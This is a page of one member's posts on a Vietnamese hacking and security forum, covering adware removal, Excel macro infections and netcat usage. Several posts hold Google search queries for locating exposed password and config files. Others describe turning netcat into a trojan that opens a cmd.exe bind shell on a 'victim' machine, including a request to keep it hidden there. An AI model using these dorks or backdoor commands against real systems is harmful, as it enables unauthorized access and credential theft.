banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: neomatrix  XML
Profile for neomatrix Messages posted by neomatrix [ number of posts not being displayed on this page: 0 ]
 
Không thì bạn sử dụng "Netop" mọi hoạt động của máy con máy chủ sẽ thấy hết,và còn có thể can thiệp trực tiếp lên máy con nữa,Máy chủ của bạn sẽ như một chiếc camera quay toàn bộ hoạt động của máy con.và hung thủ mà bạn nói nó sẽ bị xa lưới thui.chúc thành công
Bị nhiễm con RonBtok rùi.BKAV phiên bản mới nhất quét là okei.
Nén nó lại bằng Winrar rồi đặt pass winrar là okei.
Mycomputer>Manager>Enable Accoun Guess.okei
Nếu Logon mà đòi username và pass thì bỏ chọn Logon use Username and Pass.okei
Mình nghĩ diễn đàn HVA là nơi chia sẽ kiến thức,chia sẽ kinh nghiệm,học hỏi lẫn nhau, cùng nhau bàn luận những vấn đề theo quan điểm riêng của mình.Kiến thức về tin học là vô hạn ,không một IT nào có thể vỗ ngực xưng tên là "mình biết tất cả",mỗi một IT có một thế mạnh của mình.Mình luôn mong chờ những Reply của các bạn mang tính phân tích,xây dựng một cách cởi mở,thẳng thắn và "phải luôn tôn trọng nhau" có như thế thì mình mới thu được nhiều kiến thức ,được nhiều kinh nghiệm từ mỗi member >Hãy cùng nhau xây dựng HVA các bạn nhé.
- "index of" htpasswd/passwd
- allinurl: admin mdb
- "config.php"
- auth_user_file.txt
- filetype:dat "password.dat"
- filetype:ini ws_ftp pwd
- intitle:test.page.for.apache "it worked"
Đây là diễn đàn Trojan,Virus mong các bạn thảo luận đúng topic của nó.thanks
Mình dùng đủ mội chiêu mà vẫn không sao diệt nó được,zdô thế bí lắm nên mình pải cài lại win.Nhưng không lẽ chưa ai gặp con này sao???
Mình mới vừa gặp một con Virus không biết họ gì.Nhưng khi chui vào máy mình nó thay đổi trang chủ của IE thành một trang download software Scan Virus nhưng phải trả tiền thì mới sài soft được.Cứ khoảng 3 phút nó hiện thông báo ở System Tray một bản thông báo đại loại là: "hệ thống của bạn đã không được bảo vệ và đã bị nhiễm virus click vào đây để tải phần mềm diệt Virus".Các bạn có biết con này và cách diệt nó không??tư vấn cho mình với.Thanks very nhiều. :?: :?:
:!: Uhm!! Nếu là Macro do mình viết bằng VB thì không có chuyện gì rồi,nhưng khổ nổi những file excel của mình nó bị lây nhiễm Macro từ các file Excel khác, và nó hoạt động không bình thường : ví dụ như gởi mail có đính kèm theo 1 file excel thì người nhận lại nhận được 2 file excel một lần.
Vào MSconfig > Starup>tắt norBtok đi
Biến Netcat thành một trojan
- trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn -l(listen) và -p port để xác định số hiệu cổng cần lắng nghe, -e <tên_chương_trình_cần_chạy> để yêu cầu netcat thi hành 1 chương trình khi có 1 kết nối đến, thường là shell lệnh cmd.exe(đối với NT) hoặc /bin/sh(đối với Unix). Ví dụ:

E:\>nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
sent 0, rcvd 0: unknown socket error
***
Cho mình hỏi :mình cho netcat của máy tính victim ở chế độ lắng nghe c:\>nc -nvv -l -p 8080 -e cmd.exe thì lúc này máy tính của mình kết nối với máy tính của victim ở cổng 8080 là ok khi máy tính của victim đang chạy command prompt nhưng khi mt của victim tắt command prompt đi thì mình không kết nối đc.Vậy không lẽ mõi lần mình muốn kết nối với máy tính của victim thì mình kêu victim mở comman prompt cho mình kết nối uh.như vậy thì phức tạp wá.Có cách nào mình config netcat mở sẵn cổng mặc định và cho nó chạy ẩn ở máy tính của victim k?? Mình chỉ mới sử dụng netcat lần đầu nên chưa có kinh nghiệm lắm mong nhận được sự giúp đỡ của các bạn.thankx
Nói rõ hơn một chút đi bạn.Các file Excel của mình bị dính Macro làm cho dug lượng lớn lên nhiều lắm.Thankx
Cảm ơn Reply của bạn, mình đã copy file nc sang ổ C rồi vào command line type ...thế là okei.Reply của bạn mang tính rất là xây dựng và hướng dẫn rất mong cộng đồng HVA ai cũng như thế để mình xây dựng diễn vững mạnh.Thanks
Mình đã tải nó về rùi.Nhung khi mình mở nó ra đánh lệnh c:\nc -h thì no' hiện thông tin lên rất nhanh rồi thoát chương trình luôn ,không hiểu sao nữa.giúp mình
Chào tất cả thành viên HVA rất vui khi HVA hoạt động trở lại smilie
Cho mình hỏi có cách nào để xóa các Macro bị nhiễm trong Excel k? reply cho mình với.thankx
Không hiểu tại sao con Netcat của mình đánh lệnh vào là nó tắt luôn.cho mình con Netcat for Win nhé.đa tạ
 
Go to Page:  First Page Page 1

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|